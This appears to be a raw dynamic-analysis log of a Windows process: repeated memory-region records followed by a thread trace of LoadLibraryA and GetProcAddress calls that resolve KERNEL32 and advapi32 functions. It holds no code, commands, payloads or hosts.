"pagefile_0x00000000001d0000" filename = "" Region: id = 399 start_va = 0x1d0000 end_va 
= 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 400 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 401 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 402 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 403 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 404 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 405 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 406 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 407 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 408 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 409 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 410 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 411 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 436 start_va = 0x1d0000 
end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 437 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 438 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 439 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 440 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 441 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 442 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 443 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 444 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 445 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 446 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 447 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 448 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 449 start_va = 
0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 450 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 451 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 521 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 522 start_va = 0x1890000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001890000" filename = "" Region: id = 523 start_va = 0x1ca0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 524 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 525 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 526 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 527 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 528 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 529 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 530 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 531 start_va = 
0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 532 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 533 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 534 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 535 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 536 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 537 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 538 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 539 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 540 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 541 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 542 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 543 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 544 start_va 
= 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 545 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 546 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 547 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 548 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 549 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 550 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 551 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 552 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 553 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 554 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 555 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 556 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 557 
start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 558 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 559 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 560 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 561 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 562 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 575 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 576 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 577 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 578 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 579 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 580 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 581 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 
582 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 583 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 584 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 585 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 586 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 587 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 588 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 589 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 590 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 591 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 592 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 593 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 594 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id 
= 595 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Thread: id = 2 os_tid = 0xa8c [0090.849] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0090.850] GetProcAddress 
(hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0090.851] GetProcAddress 
(hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 
0x7695afab [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0090.853] GetProcAddress 
(hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0090.854] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0090.854] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 
0x7695154e [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0090.855] GetProcAddress 
(hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0090.856] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0090.856] GetProcAddress 
(hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0090.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0090.856] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0090.856] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0090.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0090.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 